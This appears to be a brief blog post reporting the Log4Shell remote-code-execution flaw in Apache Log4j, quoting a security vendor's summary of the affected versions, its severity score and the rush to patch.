Severe Flaw In Java Library Sends Sysadmins Scrambling To Patch Everything

A new actively exploited vulnerability has been discovered and sysadmins around the world are scrambling to patch all the things. MalwareBytes has a very good description of this here, but here’s the highlights:

If you’re running a service that relies on Apache Struts or uses the popular Apache Log4j utility we hope you haven’t made plans for the weekend.

An exploit listed as CVE-2021-44228 was made public on December 9, 2021. The exploit is simple, easy to trigger, and can be used to perform remote code execution (RCE) in vulnerable systems, which could allow an attacker to gain full control of them. All an attacker has to do is get the affected app to log a special string. For that reason, researchers have dubbed the vulnerability “Log4Shell”.

The vulnerability has a CVSS score of 10.0 out of a possible 10. It impacts Apache Log4j versions 2.0-beta9 to 2.14.1. Mitigations are available for version 2.10 and higher.

Log4j is an open source logging library written in Java that was developed by the Apache Software Foundation. Millions of applications use it, and some of them are enormously popular—such as iCloud, Steam, and Minecraft—so the potential reach of this problem is enormous.

I can say that many companies are scrambling to patch the vulnerability via asking my friends “off the record”. I have to assume that it includes Steam and Apple as they are specifically called out as being vulnerable. That’s because it is being actively exploited. Thus making this is as non trivial as “non trivial” gets.

Yikes!

One Response to “Severe Flaw In Java Library Sends Sysadmins Scrambling To Patch Everything”

  1. […] of the rather catastrophic Log4j vulnerability that sent the planet scrambling to patch all the things last week before they were exploited by bad […]

Leave a Reply

%d bloggers like this: